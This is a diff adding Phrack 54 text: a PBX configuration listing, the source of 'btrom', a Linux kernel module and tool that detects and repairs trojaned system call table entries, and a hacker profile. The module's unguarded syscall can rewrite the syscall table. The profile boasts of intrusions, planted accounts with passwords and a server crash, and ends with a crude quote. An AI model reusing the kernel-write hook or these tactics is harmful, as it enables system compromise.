+        origin-   N block-     N o/g_tk_rest-N    privacy-    Y 
+        excl_hold-N hard_hold- N last_num-   Y    security-   N 
+        att-      N auto_unatt-N passcode-   NONE check_out-  N 
+        type-     1 announcer- N multi_app-  N    send_id-    Y 
+        ali-   NONE opx-       N hf_relevant-Y    music_on_hold-0
+ 
+LCR/ROUTING - Libraries, update, or display.
+NUMBERING PLAN - Lines, and there features:  UPDATE, DISPLAY, ADD,
+                 REMOVE, or SHOW
+ 
+STATION TIMERS - EXAMPLE:
+                                1 unit = 0.1 sec.
+                                RING-  450  
+                                MULT_APR_RING-  200  
+                                BUSY- 1200  
+                                REORDER-   50  
+                                CONFIRM-   30  
+                                DVMS-  200  
+                                HOLD- 6000  
+                                HARD_HOLD- 1200  
+                                PARK- 1200  
+                                PAGE_Q-  600  
+                                1st_DGT -  100  
+                                INTERDGT-  150  
+                                FEAT_DIAL-  700  
+                                HKFLS_FILTER-    10  
+                                MAGNETO_AUTO_ANS-    30  
+                                CF_NO_ANS- 200  
+ 
+SYSTEM GEN - MENU:
+                (SYSGEN)
+                0-INSTALL
+                1-SIZES_DEF
+                2-SIZES_TAB
+                3-SPEED_CALLS (MCC only)
+                4-MUSIC
+                5-TIME_SLOTS (4GC only)
+                0-TRUNK_CALLS_OUTGOING
+ 
+SYSTEM FEATURES - Trunk_calls_incoming, station_options, intercept/
+                  incomplete, call_forwarding, camp_on, hotel,messaging, 
+                  tones, diagnosrics, ISDN, network, and wireless
+TONE PLAN - EXAMPLE:
+~~~~~~~~
+NO NAME     TYPE #SEG 1TN Msec 2TN Msec 3TN Msec 4TN Msec 5TN Msec 6TN Msec
+ 0 Busy       3    2    3  500   0  500   0    0   0    0   0    0   0    0
+ 1 Dial       1    0    1    0   0    0   0    0   0    0   0    0   0    0
+ 2 Distinct.  1    0    4    0   0    0   0    0   0    0   0    0   0    0
+ 3 Reorder    3    2    3  240   0  240   0    0   0    0   0    0   0    0
+ 4 Ringback   3    2    2 2000   0 4000   0    0   0    0   0    0   0    0
+ 5 Silence    1    0    0    0   0    0   0    0   0    0   0    0   0    0
+ 6 Tick       3    2    5   60   0 1000   0    0   0    0   0    0   0    0
+ 8 Confirm    3    2    1  100   0  100   0    0   0    0   0    0   0    0
+ 9 BRK_In/Out 1    0    5    0   0    0   0    0   0    0   0    0   0    0
+11 V.P Conf   3    2    3  100   5  100   0    0   0    0   0    0   0    0
+12 Z.P Warn   3    2    6  300   3  100   0    0   0    0   0    0   0    0
+14 LCR_expens 2    6    0  120   5   80   0  120   5   80   0  120   5   80
+15 LCR_cheap  2    4    0  120   5   80   0  120   5   80   0    0   0    0
+16 Call Wait  3    4    5  600   0 5000   0 5000   0 5000   0    0   0    0
+17 DISA Dial  1    0    1    0   0    0   0    0   0    0   0    0   0    0
+ 
+TRUNK DEFINITION - EXAMPLE:
+                        DISA (0-NO /1-IMMED. /2-DELAY)- 0  
+                        COS.-  10  
+                        TK_TIMER#-  1  
+                        TYPE (0-PULSE /1-DTMF /2-MIX)- 1  
+                        I/C_ONLY-N   
+                        O/G_ONLY-N   
+                        BUSY_OUT-N   
+                        AUTO_GUARD-N   
+                        HOT_IMMED-N   
+                        HOT_DELAY-N   
+                        DROP_NO_DIAL-N   
+                        RSRVD_TO-    NONE    
+                        CALLER_ID_TIMEOUT -  50  
+TRUNK TIMERS - EXAMPLE:
+                        H.FLASH(10ms)-    67  
+                         INCOMING :
+                        E&M_SEIZE_TO_WINK-     1  
+                        E&M_CONT_WINK_TIME-     2  
+                         OUTGOING :
+                        E&M_CONT_WINK/SG_DELAY-     1  
+                        SEIZE_TO_DIAL-    15  
+                        SECOND_DIAL_TONE-    60  
+ 
+VFAC - Account maintance. - Requires password.
+ 
+---The ones that I didn't list were either self-explanitory, or N/A 
+
+
+0x5>-------------------------------------------------------------------------
+
+b t r o m							   b y   r i q
+------------------------------------------------------------------------------
+"trojan eraser or i want my system call table clean"
+
+------------------------------------------------------------------------------
+i n t r o d u c t i o n
+------------------------------------------------------------------------------
+The other day, I started to play with the itf that appeared in P52-18 (read
+that article if you want to know what it does, etc).  It occured to me one
+good way to determine if someone has installed the trojan (and to subsequently
+remove it) is by fixing the system call table.  This program tries to do that.
+This works with the the linux x86 2.0 and 2.2 series.
+
+
+------------------------------------------------------------------------------
+i n t e r n a l s
+------------------------------------------------------------------------------
+The program first attempts to detect if you are using a BIG_KERNEL (a bzImage)
+or not (a zImage).  One of the differences is the address of the kernel in
+memory.  BIG_KERNEL starts at 0xc0000000 while the other starts at 0x00100000.
+
+The system call table (sct) has the entries of all the system calls.  If
+you modify the sct, the new entry must be `out of range'.  btrom will try to
+fix these `out of range' system calls with their original values.  They are
+taken from the System.map.  What i mean with "`out of range'" is an entry
+that has a value out of the start_of_the_kernel and the_start_of_the_kernel +
+some_value.  This value is in the config.h
+ 
+
+------------------------------------------------------------------------------
+q u i c k   i n s t a l l
+------------------------------------------------------------------------------
+compile:
+--------
+1) edit config.h and Makefile. Modify it if you want.
+	$ vi config.h
+	$ vi Makefile
+
+2) make
+	$ make
+
+use:
+----
+1) be root
+	$ su -
+
+2) install the module mbtrom 
+	# insmod mbtrom
+
+3) run btrom
+	# ./btrom _nr_mbtrom_ [options]
+
+4) uninstall the module mbtrom
+	# rmmod mbtrom
+
+
+------------------------------------------------------------------------------
+c h a c h a r a
+------------------------------------------------------------------------------
+1st part: detect trojans legends
+[ ] this is ok. dont worry
+[N] this is a null enter in the system call table. dont worry.
+[-] this is the entry of the module mbtrom. dont worry.
+[?] this entry has a system function, but it was supposed to be null. worry
+[*] this is probably a trojan in a reserved space. worry.
+[!] this is probably a trojan in a not reserved space. worry.
+
+2nd part: clean trojans legends
+<s> press 's' to fill this entry with the System.map's value.
+<c> press 'c' to clean this entry. it will be filled with a null entry.
+<m> press 'm' to put in this entry a manual hexa address.
+<i> press 'i' to ignore, skip, what you want.
+
+------------------------------------------------------------------------------
+n o t e s
+------------------------------------------------------------------------------
+this program doesnt uninstall trojan modules.
+this program disables the trojans, so, after that,
+you can uninstall the trojan with 'rmmod'.
+
+
+------------------------------------------------------------------------------
+b u g s
+------------------------------------------------------------------------------
+if `insmod mbtrom' doesnt returns any value, is because you are redirecting
+that message with syslogd. Please check /etc/syslog.conf and see "kern".
+
+
+------------------------------------------------------------------------------
+h i s t o r y
+------------------------------------------------------------------------------
+* version 0.3 (01/12/98) compatible with kernel 2.0 y 2.2. 
+			 works with BIG_KERNEL and with SMALL
+			 english version
+* version 0.2 (25/11/98) first version 
+* version 0.1 (21/11/98) something really ugly 
+* all this happened when i see the itf (intregated trojan facility in P52-18)
+
+
+------------------------------------------------------------------------------
+f e e d b a c k
+------------------------------------------------------------------------------
+riq@ciudad.com.ar
+
+<++> linenoise/btrom/Makefile
+#
+# Makefile del  b t r o m
+#
+
+
+## BUG. This must be the same as the one in config.h
+SYSTEM_MAP = "/usr/src/linux/System.map"
+
+AWK	= awk
+CC	= gcc
+#CFLAGS	= -DSYSTEM_MAP=$(SYSTEM_MAP)
+
+all: parse btrom mbtrom
+
+parse:
+	$(AWK) -f sys_null.awk $(SYSTEM_MAP) > sys_null.h
+
+btrom: btrom.o 
+	$(CC) btrom.c -O2 -Wall -o btrom
+
+mbtrom:
+	$(CC) -c -O3 -Wall -fomit-frame-pointer mbtrom.c	
+
+clean: 
+	rm -f mbtrom.o btrom.o btrom sys_null.h
+<-->
+<++> linenoise/btrom/btrom.c
+/*
+ * btrom - Borra Trojanos Modulo
+ * por Riq
+ *  1/Dic/98: 0.3 - Compatible con kernel 2.2 y soporta BIG_KERNEL
+ * 25/Nov/98: 0.2 - Version inicial. Soporta kervel 2.0 i386
+ */
+#include <stdio.h>
+#include <unistd.h>
+#include <asm/unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <fnmatch.h>
+#include <strings.h>
+#include <linux/sys.h>
+
+#include "config.h"
+#include "sys_null.h"
+
+FILE *sm;
+FILE *au;
+int quiet;
+int borrar;
+int dif_n_s;
+unsigned int big_kernel;
+
+/***********************************************************************
+	System.map	
+************************************************************************/
+int sm_b_x_nom( unsigned int *address, char *estoy )
+{
+	char buffer[200];
+	char sys_add[20];
+
+	fseek(sm,0L,SEEK_SET);
+	while( fgets(buffer,200,sm) ) {
+		if( fnmatch(estoy,buffer,0)==0 ) {
+			strncpy(sys_add,buffer,8);
+			sys_add[8]=0;
+			*address = strtoul(sys_add,(char **)NULL,16);
+			return 1;
+		}
+	}
+	return 0;
+}
+
+int sm_busca_x_nombre( unsigned int *address, char *estoy)
+{
+	char nombre[50];
+
+	sprintf(nombre,"*T sys_%s\n",estoy);
+	return sm_b_x_nom(address, nombre);
+}
+
+FILE* sm_open()
+{
+	return fopen( SYSTEM_MAP, "r" );
+}
+
+/***********************************************************************
+	asm/unistd.h
+************************************************************************/
+void au_dame_el_nombre( char *dst, char *orig )
+{
+	int i,j;
+
+	j=i=0;
+	while( orig[i]!='_' )
+		i++;
+	i=i+5;
+	while( orig[i]!=' ' && orig[i]!='\t' ) 
+		dst[j++]=orig[i++];
+	dst[j]=0;
+}
+	
+int au_b_x_num( char *nombre, int numero )
+{
+	char buffer[200];
+	char buscar[50];
+
+	/* FIXME: ?sera mas efectivo regexec() que fnmatch()? */
+	sprintf(buscar,AU_PREFIX"%i*",numero);
+	while( fgets(buffer,200,au) ) {
+		if( fnmatch(buscar,buffer,0)==0 ) {
+			au_dame_el_nombre(nombre,buffer);	
+			return 1;
+		}
+	}
+	/* No encontre... entonces una segunda pasada */
+	fseek(au,0L,SEEK_SET);
+	while( fgets(buffer,200,au) ) {
+		if( fnmatch(buscar,buffer,0)==0 ) {
+			au_dame_el_nombre(nombre,buffer);	
+			return 1;
+		}
+	}
+	return 0;
+}
+
+int au_busca_x_numero(char *nombre, int numero)
+{
+	return au_b_x_num(nombre,numero);
+}
+
+FILE* au_open()
+{
+	return fopen( ASM_UNISTD, "r" );
+}
+
+/*****************************************/
+/* Comun a la primer y segunda recorrida */
+/*****************************************/
+int comun_1er_2da( int j, int i , char *nombre , char *c, int clean, unsigned int retval)
+{
+	int a;
+	a = clean;			/* bug fix */
+	nombre[0]=0;
+
+	/* i!=0 porque el asm/unistd del kernel 2.2 no viene */
+	if( i!=0 && au && au_busca_x_numero(nombre,i)) {
+		if( retval > big_kernel + LIMITE_SYSCALL ) {
+			*c = '*' ;
+			clean++;
+		} else
+			*c = ' ';
+	} else {
+		if( retval > big_kernel+LIMITE_SYSCALL ) 
+			*c = '!';
+		else 
+			*c = '?';
+		clean++;
+	}
+	if(i==j) { 				/* modulo btrom */
+		*c='-';
+		clean=a;
+	} else if(retval==SYS_NULL || retval==0) {/* Null pointer */
+		*c='N'; 
+		clean=a;
+	}
+	return clean;
+}
+/**********************************************************************
+	primer_recorrida: Detectar troyanos
+**********************************************************************/
+int primer_recorrida(int j)
+{
+	char nombre[50];
+	int address;
+	int i,old_clean,clean;
+	unsigned int retval;
+	char c;
+
+	old_clean=clean=0;
+	printf( "\n1st part: Detect trojans\n"	
+		"                     [ ]=OK [N]=Null [-]=btrom\n"
+		"                             [?] Mmm...syscall\n"
+		"        Address          [*][!]=trojan routine\n"
+		"  now   System.map Num [ ] Syscall Name\n"
+		"----------------------------------------------\n");
+
+	for( i=0; i< NR_syscalls; i++ ){
+		__asm__ volatile (
+			"int $0x80":"=a" (retval):"0"(j),
+			"b"((long) (i)),
+			"c"((long) (0)),
+			"d"((long) (0)));
+
+		clean = comun_1er_2da(j,i,nombre,&c,clean,retval);
+		if( !quiet || clean > old_clean ) {
+			if( nombre[0]!=0 ) {
+				if( sm && sm_busca_x_nombre(&address,nombre)) {
+					if(retval!=address && retval < big_kernel + LIMITE_SYSCALL) {
+						dif_n_s++;
+						printf("%8x!%8x %3i  [%c] %s\n",retval,address,i,c,nombre);
+					} else printf("%8x %8x %3i  [%c] %s\n",retval,address,i,c,nombre);
+				} else printf("%8x          %3i  [%c] %s\n",retval,i,c,nombre);
+			} else printf("%8x          %3i  [%c]\n",retval,i,c);
+			old_clean = clean;
+		}
+	}
+	return clean;
+}
+
+/**********************************************************************
+	segunda_recorrida: Limpiar troyanos
+**********************************************************************/
+int segunda_recorrida(int j)
+{
+	char nombre[50],dire[50];
+	int address;
+	int i,old_clean,clean,retval,key;
+	char c;
+	unsigned int k;
+
+
+	old_clean=clean=0;
+	printf( "\n2nd part: Clean Trojans\n"
+		"                 s = System.map address\n"
+		"                      c = clean address\n"
+		"                     m = manual address\n"
+		"                             i = ignore\n"
+		"  now   System.map Num [ ] Syscall Name\n"
+		"---------------------------------------\n");
+
+	for( i=0; i< NR_syscalls ; i++ ){
+		__asm__ volatile (
+			"int $0x80":"=a" (retval):"0"(j),
+			"b"((long) (i)),
+			"c"((long) (0)),
+			"d"((long) (0)));
+
+		clean = comun_1er_2da(j,i,nombre,&c,clean,retval);
+		if( clean > old_clean ) {
+			if( nombre[0]!=0 ) {
+				if( sm && sm_busca_x_nombre(&address,nombre)) {
+					if(retval!=address && retval < big_kernel + LIMITE_SYSCALL) {
+						dif_n_s++;
+						printf("%8x!%8x %3i  [%c] %s <s/c/m/I>?",retval,address,i,c,nombre);
+					} else printf("%8x %8x %3i  [%c] %s <s/c/m/I>?",retval,address,i,c,nombre);
+				} else printf("%8x          %3i  [%c] %s <c/m/I> ?",retval,i,c,nombre);
+			} else printf("%8x          %3i  [%c] <c/m/I> ?",retval,i,c);
+			old_clean = clean;
+			
+			fseek(stdin,0L,SEEK_END);
+			key=fgetc(stdin);
+			switch(key) {
+				case 's':
+					k = address;
+					break;
+				case 'c':
+					k = SYS_NULL;
+					break;
+				case 'm':
+					printf("Enter an hexa address (ex: 001a1b):");
+					fseek(stdin,0L,SEEK_END);
+					fgets( dire,50,stdin );
+					k = strtoul(dire,(char **)NULL,16);
+					break;
+				default:
+					k=1;
+					break;
+			}
+			/* FIXME: 1 no se puede poner como address */
+			if(k!=1)
+				__asm__ volatile (
+					"int $0x80":"=a" (retval):"0"(j),
+					"b"((long) (i)),
+					"c"((long) (1)),
+					"d"((long) (k)));
+		}
+	}
+	return clean;
+}
+
+void help()
+{
+	printf(	"\nUsage: btrom nr_of_mbtrom [-c][-v]\n"
+		"\t1) Install the module mbtrom with`insmod mbtrom'\n"
+		"\t2) The module must return a value.If not see the README->bugs\n"
+		"\t   btrom value_returned_by_mbtrom [-c][-v]\n"
+		"\t   `v' is verbose. Recommended\n" 
+		"\t   `c' is clean. Cleans the trojans\n"
+		"\t3) Uninstall the module mbtrom with 'rmmod mbtrom'\n"
+		"\n"
+		"\tExamples:\n"
+		"\t btrom 215 -cv\n"
+		"\t btrom 214 -v\n"
+		"\t btrom 215\n"
+		"\nWarning: Dont put random numbers. Be careful with that!"
+		"\nRecommended: Do `btrom _number_ -v' before a cleaning\n\n"
+		);
+	exit(-1);
+}
+
+void chequear_argumentos( char *parametros )
+{
+	int i,j;
+	i=strlen(parametros);
+
+	if(parametros[0]!='-') help();
+
+	for(j=1;j<i;j++) {
+		switch(parametros[j]) {
+			case 'c':
+				borrar = 1;
+				break;
+			case 'v':
+				quiet = 0;
+				break;
+			default:
+				help();
+		}
+	}
+}
+
+int main(int argc, char **argv, char **envp )
+{
+	unsigned int retval;
+	int clean;
+	int i;
+
+	printf( "\n\n"
+		"b t r o m                          b y   r i q\n"
+		"v"VERSION"\n");
+
+	if(argc <2 || argc >3 ) help();
+
+	quiet = 1; borrar = 0 ;
+	if( argc==3) chequear_argumentos(argv[2]);
+
+	au = au_open();
+	sm = sm_open();
+	if(!au && !quiet)	
+		printf("Error while opening `asm/unistd.h' in `"ASM_UNISTD"'\n");
+	if(!sm && !quiet)	
+		printf("Error while opening `System.map' in `"SYSTEM_MAP"'\n");
+
+	dif_n_s=0;
+
+
+	/* __NR_mbtrom number */
+	i = atoi( argv[1] );
+	if(!i)
+		help();
+
+	/* Chequeo si es BIG_KERNEL o no */
+	__asm__ volatile (
+		"int $0x80":"=a" (retval):"0"(i),
+		"b"((long) (0)),
+		"c"((long) (2)),
+		"d"((long) (0)));
+
+	big_kernel =(retval>BIG_KERNEL?BIG_KERNEL:SMALL_KERNEL);
+
+	/* Primer recorrida */
+	clean = primer_recorrida( i );
+
+	/* Mensaje del senior btrom */
+	printf( "\nb t r o m   s a y s:\n");
+	if(dif_n_s>0) {
+		printf( "Your System.map seems to have a problem.\n");
+		if(dif_n_s<SYSMAP_LIMIT)
+			printf( "Wait. Perhaps this is not a System.map problem,\n"
+				"but something related with the new functions names.\n"
+			);
+		else
+			printf( "Are you sure that you have a valid System.map ?\n");
+		if(clean)
+			printf( "Oh no! The problem is the trojan that you have ;-)\n");
+	}	
+
+			
+	if(!clean) {
+		printf( "You system call table seems to be clean.\n");
+		if(quiet)
+			printf("If you want to be more sure use the `-v' option\n");
+	} else {
+		printf( "\nWhat do you want to do with the trojan?\n"
+			"What about cleaning it with `btrom _numero_ -c'?\n" );
+	}
+
+
+	/* Ah borrar los troyanos se ha dicho */
+	if(borrar && clean) {
+		if(au)
+			fseek(au,0L,SEEK_SET);
+		if(sm)
+			fseek(sm,0L,SEEK_SET);
+
+		segunda_recorrida( i );
+	}
+
+
+	if(au)
+		fclose(au);
+	if(sm)
+		fclose(sm);
+
+	return 0;
+}
+<-->
+<++> linenoise/btrom/config.h
+/*
+	config.h
+	usado por btrom.c y mbtrom.c
+*/
+
+
+/*
+	Modificar segun los gustos 
+*/
+
+/* Numero que uno supone que esta vacio en la sys_call_table */
+#define NUMERO_VACIO 215
+
+/* Path al archivo System.map */
+/* Si Ud. nunca compilo el kernel tal vez sea /boot/System.map */
+/* FIXME: Usar el define del Makefile para no definir esto en 2 partes */
+#ifndef SYSTEM_MAP
+ #define SYSTEM_MAP "/usr/src/linux/System.map"
+#endif
+
+/* Hay problemas con old y new. Gralmente no es problema de la System.map */
+#define SYSMAP_LIMIT 8
+
+
+/* Path al archivo asm/unistd.h */
+#define ASM_UNISTD "/usr/include/asm/unistd.h"
+
+/* Prefijo a buscar en asm/unistd.h*/
+#define AU_PREFIX "#define*__NR_*" 
+
+/* Hasta donde llega el kernel space */
+/* FIXME: No se cual es el limite realmente. Igual con esto anda :-) */
+#define LIMITE_SYSCALL 0x00300000 
+
+/*
+	No modificar
+*/ 
+/* Version del btrom */
+#define VERSION "0.3"
+
+/* BIG_KERNEL y SMALL_KERNEL*/
+#define BIG_KERNEL 0xc0000000
+#define SMALL_KERNEL 0x00100000
+<-->
+<++> linenoise/btrom/mbtrom.c
+/*
+ * modulo del btrom - Borra Trojanos Modulo
+ * 25/11/98 - por Riq
+ * 
+ * compile with:
+ *   gcc -c -O3 -fomit-frame-pointer mbtrom.c
+ * 
+ */
+#define MODULE
+#define __KERNEL__
+
+#include <linux/config.h>
+#ifdef MODULE
+#include <linux/module.h>
+#include <linux/version.h>
+#else
+#define MOD_INC_USE_COUNT
+#define MOD_DEC_USE_COUNT
+#endif
+
+#include <syscall.h>
+#include <linux/string.h>
+#include <linux/types.h>
+#include <linux/fs.h>
+#include <linux/mm.h>
+#include <linux/malloc.h>
+#include <linux/dirent.h>
+#include <linux/sys.h>
+#include <linux/linkage.h>
+#include <asm/segment.h>
+
+#include "config.h"
+#include "sys_null.h"
+
+extern void *sys_call_table[];
+
+int __NR_mbtrom;
+
+int* funcion( int numero, int modo, unsigned int *address )
+{
+	switch(modo){
+		case 0:
+			return sys_call_table[numero];
+			break;
+		case 2:
+			return (void *)&sys_call_table;
+		case 1:
+		default:
+			sys_call_table[numero]=address;
+			break;
+	}
+	return (void *)0;
+}
+
+int init_module(void)
+{
+	__NR_mbtrom = NUMERO_VACIO ;
+
+	/* Chequea direccion vacia desde NUMERO_VACIO hasta 0 */
+	while ( __NR_mbtrom!= 0 &&
+		sys_call_table[__NR_mbtrom] != 0 &&
+		sys_call_table[__NR_mbtrom] != (void *)SYS_NULL )
+		__NR_mbtrom--;
+	if(!__NR_mbtrom ) { /* Si es 0 me voy */
+		printk("mbtrom: Oh no\n");
+		return 1;
+	}
+		
+	sys_call_table[__NR_mbtrom] = (void *) funcion;
+
+
+	if( __NR_mbtrom != NUMERO_VACIO )
+		printk("mbtrom: Mmm...\n");
+	printk("mbtrom: -> %i <-\n",__NR_mbtrom);
+	return 0;
+}
+
+void cleanup_module(void)
+{
+	sys_call_table[__NR_mbtrom] = 0;
+	printk("mbtrom: Bye.\n");
+}
+<-->
+<++> linenoise/btrom/sys_null.awk
+/sys_ni_syscall/ { print "#define SYS_NULL 0x"$1 }
+<-->
+
+0x6>-------------------------------------------------------------------------
+
+----[  PDM
+
+Phrack Doughnut Movie (PDM) last issue was `Miller's Crossing`.
+
+PDM53 recipients:
+
+    None of you suckers.  Go rent it.  It's well worth your time.
+
+PDM54 Challenge:
+
+    "I have John Murdock...  In mind..."
+
+0x7>-------------------------------------------------------------------------
+
+----[  Super Elite People That REad Phrack (SEPTREP)
+
+New addiitons:      Ron Rivest, W. Richard Stevens
+Why they are SEP:   One is the `R` in RSA.  The other writes TCP/IP bibles.
+
+----[  Current List
+
+W. Richard Stevens
+Ron Rivest
+
+-----------------------------------------------------------------------------
+
+----[  EOF
diff --git a/phrack54/4.txt b/phrack54/4.txt
new file mode 100644
index 0000000..66bb9cc
--- /dev/null
+++ b/phrack54/4.txt
@@ -0,0 +1,248 @@
+----[  Phrack Magazine  Volume 8, Issue 54 Dec 25th, 1998, article 04 of 12
+
+
+-------------------------[  P H R A C K     5 4     P R O P H I L E
+
+
+-----------------[  Personal
+
+
+              Handle: ParMaster
+            Call him: Ishmael?  SHALL WE PLAY A GAME?
+           Reach him: Through the grapevine
+        Past handles: Trouble Verify, Immediate Lee, Bad Karma, Thoth,
+                      Optomystic, (The) Omicron
+       Handle origin: (Quote from Underground page #104) "Par had got his full
+                      name  -The Parmaster- in his earliest hacking days.
+                      Back then, he belonged to a group of teenagers involved
+                      in breaking the copy protections on software programs
+                      for Apple IIe's, particularly games.  Par had a
+                      special gift for working out the copy protection
+                      parameters, which was a first step in bypassing the
+                      manufacturers' protection schemes.  The ringleader
+                      [sc0tch] of the group [Jedi Hackers] began calling
+                      him 'the master of parameters' -The ParMaster- Par,
+                      for short.  As he moved into serious hacking and
+                      developed his expertise in X.25 networks, he kept the
+                      name because it fitted nicely in his new environment.
+                      'Par' was a common command on an X.25 pad, the modem
+                      gateway to an X.25 network."
+       Date of birth: NOT January 15th!
+ Age at current date: 27
+              Height: 5'11"
+              Weight: 202 lbs
+           Eye color: Brown
+          Hair color: Brown (Blonde highlights)
+           Computers: Dell 320n 386 laptop, Walkabout vt100 terminal with
+                      built-in 2400 baud modem.
+   Sysop/Co-Sysop of: DarkF0RCE  
+            Admin of: [Withheld]
+                URLs: http://altavista.digital.com  - search - "parmaster" - 
+                      - submit - read.
+
+
+----------------[  Favorite things 
+
+               Women: Blondes with blue / green eyes.  Chicks in skimpy clothes 
+                      with accents.
+                Cars: Ferrari and Porsche clubs :-), anything with a jet 
+                      engine on it.
+               Foods: Chinese, got to have my chinese food. Calamari, Duck, 
+                      Quail, most seafood. 
+             Alcohol: Now, we're talkin'. Jim Beam, Jack Daniels, Crown Royal, 
+                      Jose Cuervo / Dos Realis, and last but certainly not
+                      least Finlandia!
+               Music: The The, The Dickies, Underworld, Kraftwerk, Chemical
+                      Brothers, Crystal Method, El Dubarge, CCCP.
+              Movies: They Live, A fish called wanda, 13 Monkees, Little
+                      Trouble in Big China, 5th Elemental, True Lies,
+                      Killer Klowns from Outer Space, Eraser, Under
+                      Siege, Tetsuo Ironman, WarGames, and Sneakers.  
+             Authors: Immanuel Velikovsky, Piers Anthony, Terry Brooks, James
+                      Gardner, J.R.R. Tolkien and please forgive me for
+                      anyone i'm missing.  
+            Turn Ons: Traveling in my mind with someone i love.
+            Turn Offs: Pain, agony, hurting and torture.
+
+
+----------------[  Passions
+
+I enjoy scrying the future and doing the great work.  This is a very difficult
+thing to describe in itself.  Some of you who know me well enough can see it
+every once in a while.  I'm no artist, but i attempt to do it and sometimes it
+expresses itself in artistic ways.
+
+I love hanging out with my friends, sometimes i need to be alone, but time
+i spend with my friends is always special.
+
+
+----------------[  Memorable experiences
+
+When the US Secret Service raided me in 1991 and took all my stuff (the 3rd
+time) including the credit reports of the President (iffie) and Vice President
+(definitely) of the United States of America.  I was in jail in New York
+waiting for transport, and was never really threatened or hurt, except once
+and it was a major incident for me but i don't think it was influenced by
+anyone.
+
+When i did an interview for Coast Weekly Magazine in Monterey County in
+1993, after this issue came out things really fell apart for me, people
+started being really mean and really dangerous people started doing really
+harmful things around me.  This article was my one 'play article'.  I
+mentioned a lot of stuff that was currently going on, including the Clinton
+Administration's use and promotion of the new Clipper Chip device.. I wonder
+why the guys who did a play article for the San Jose Mercury News didn't
+receive the same treatment.  My relatives always told me life isn't fair,
+until this time i had plenty of reasons to beleieve that but never did.
+Incidents following this made me really question how the United States was
+changing.  It especially made me question who is running the world nowadays
+and who they made a decision to hire under them to work in various agencies.
+Everything just seemed to have more style before.  However, there are also a
+lot of cool things with style brought about by this, which may be worth the
+hardships in their value.
+
+Using sprite to send an out of bounds packet to port 139 of trv-psitech.com,
+the server was down for a little bit, a day or two.  The error it responded
+with, "Parameter not found".
+
+Creating IRAQ-DEFENSE password PARMASTERG0TTHEM! on tymnet while i was "in".
+I'm not sure what effect this had during the time i had set it up during
+Operation Desert Shield.  I put it out into the computer underground globally
+promoting it as an iraqi system i had found.  What effect this may have had
+during that time i still do not know.  Logically all i can assume is that it
+managed to put a lot of hackers who tried it, in one place at the time when
+they connected to it.  As well as promote and possibly move them toward being
+aware of any enemy computers they may have hacked.  Indeed, on the boards
+i was confronted about it... Specifically by Crimson Death who stated in the
+posts that it was, in fact, not an iraqi system at all.  Interestingly enough
+in following posts people responded *WITH* actual network addresses and
+hosts of iraqi systems.  Too bad at the time all communications were cut.
+Most certainly, their access to the outside worlds computers was at least
+partially if not totally through Bahrain.  Every once in a while i would
+periodically check on tymnet's bahrain gateway and monitor traffic there.
+For those of you who wonder why i did this, i don't know... I can honestly say
+I wasn't in conscious control of what i was doing.  I have some theories about
+why, some include a higher power others include some pretty crazy stuff like
+mind control.  I'm leaning somewhat towards the latter because i had some
+severe memory problems.  I could not remember anything about this until I
+was on a phone interview with Joshua Quittner for the Masters of Deception
+book, why at that time I recalled it i do not know.  I do know that prior
+to this time in searching through my memory fervently that I had not
+previously at any other time after 1990 thought about or recollected my
+actions then.  The only thing i remembered was creating ParMasterX75 nui
+Password par=tymnet gawd! and that was because the account I had used to
+make IRAQ-DEFENSE had mysteriously changed its properties and now was
+connected to place calls on the global data network.  Prior to that it had
+only been able to connect to the select hosts of the WEFA group, its rightful
+owner.  I only became aware of this because of Corrupt [MOD] pointing out that
+I should list out what accounts were active. .. i then saw that he had created
+an account which could be used to place data calls.  John apparently did
+not know that the properties of the account's access had changed and that
+it did not have access to do things like that before, if he did he was not
+offering that knowledge, or even better he may have changed it :-).
+
+Disneyland.
+
+
+----------------[  Boards to mention
+
+The board that Mr. Zod set up on the 202 sprintnet system owned by AFOSI and
+used to train them on how to catch computer hackers *GUFFAW*, my I wonder
+if they ever found out?  Weren't we why they called it that?  ROFLMFAO
+
+DarkF0RCE, I wonder whatever happened to Derek..  One Man Army..  Hmm, like
+people are posting these PC Pursuit codes on our board, i wonder where
+they came from?  Phear P0STMASTER's ACOS skills.  ROFLMFAO
+
+Pegasus, this BBS run on a VAX in switzerland ended up turning out to be part
+of a sting operation involving law enforcement in europe....  Why do all these
+k-k00l codes still work tho?
+
+Unphamiliar Territories, invalid media's board.  Managed to collect together
+quite a few people with talent as well as some really stupid asshole narks.
+Can anyone say PMF?
+
+Bullet, wherever it is...  There you are.
+
+BlackNET, so much has been said about this one in circles its not funny.  No
+one knows where it is or how to connect to it? I wonder why...  I'm confused.
+
+Fuck QSD Channel.
+
+Sectec, this board was always an old stand-by for me when the internet was
+taking off..  Now boards with discussions on packet switched nets like it
+aren't around.  Or, if they are they are hidden and not openly promoting
+themselves.  Most likely, they are somewhere on the internet...It's probably
+just me... but i don't trust the internet...  at all.
+
+ALTGER, altos computer systems munich.... i know far too many people from this
+board in real life now.  12 years ago I never would have thought that this
+would occur or feasibly see how this would happen.  It's still mind-boggling
+to me.  Old skool Apple warez crew: Blue Adept [213], Ubiquitous Hacker,
+Hollywood, Vampire, Pirette.  Others: Piper, Dr. Who, Shatter, Theorem, Nora,
+and Nasa Pilot.
+
+ALTHH, altos computer systems hamburg (later Markt and Technic... tchh), same
+as altger but I spent MUCH MUCH more time here.  I think this is where I got
+the magic.  THE crew: Floyd, TTM, Necrovore-Skyhook-backlash-LineShadow-
+TouchTone [Xtension], jumpingjackflash, Lutz Pelikan, camelot, pad-gandalf-
+fusion-power-etc [8LGM], Force-Phoenix-Nom-etc [The Realm], anthrax, there
+are too many people to list here forgive me if I left you out.  You know
+who you are. 
+
+The Phoenix Project, what a cool place, where else could I tease Sandy
+Sandquist about FTS.
+
+Illuminati BBS, my account was short lived and i logged in maybe twice.  But
+where else could i see the latest on AD&D games with, The Mentor, Erik
+Bloodaxe, etc.
+
+The initial r00t homepage, boy was this a funny joke.  Wait, i'm at a con
+and now its all real and there's like 40 people here.  These people are
+smart and make lots of money. Hosaka and T3...  You could not have known it
+would turn into this.  r00t people who kick ass: Number one for all time -
+glyph a.k.a necrovore, alhambra, oghost, redragon [tacobell.com], and daemon9.
+  
+Ripco, well I wasn't on here a lot but it played such an important part in the
+computer underground over the years i have to at least mention it.  It must
+have also been my first exposure to l0ck.  Tons of other people here, this
+place kept lots of Text files circulating in the underground that might
+have otherwise been lost.
+
+
+----------------[  Quotes
+
+"I didn't mean for your daddy to spooge all over the minnie mouse pillow on
+your bed, it wasn't my fault, i told him he could cum in my ass" -- Vamprella
+
